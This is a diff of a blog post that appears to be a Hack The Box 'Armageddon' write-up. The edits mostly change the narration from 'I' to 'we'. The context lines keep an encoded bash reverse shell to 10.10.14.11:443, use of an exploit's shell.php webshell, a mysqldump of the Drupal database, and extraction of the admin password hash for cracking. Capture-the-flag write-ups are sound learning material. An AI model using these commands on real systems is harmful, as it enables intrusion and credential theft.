Nesousx/masoopy-web/content/posts/2021-07-31-HTB-Armageddon-without-MetaSploit..md

 c=bash+-i+>%26+/dev/tcp/10.10.14.11/443+0>%261
 ```

-In case you are wondering, I am using the `shell.php` from the exploit, and I simply copy pasted the URL in browser, captured it with Burp, and converted to POST.
+NB : In case you are wondering, I am using the `shell.php` from the exploit, and I simply copy pasted the URL in browser, captured it with Burp, and converted to POST.
 Then, I could run a better script.

-Once it was done, I could dump the DB like so :
+Once it is done, we can dump the DB like so :

 `mysqldump -u drupaluser -p drupal > plop.sql`

-I then looked inside the dump and looked for user's information :
+We now look inside the dump and search for user's information :

 ![User Info](/images/2021/07/Armageddon_Dump.png)

-It appears our user is called `brucetherealadmin` and it's hash starts with `$S$` according to [hashcat](https://hashcat.net/wiki/doku.php?id=example_hashes), it is a Drupal 7 hash, which I can confirm it is!
+It appears our user is called `brucetherealadmin` and it's hash starts with `$S$` according to [hashcat](https://hashcat.net/wiki/doku.php?id=example_hashes), it is a Drupal 7 hash, which we can confirm it is!

 Now to crack it :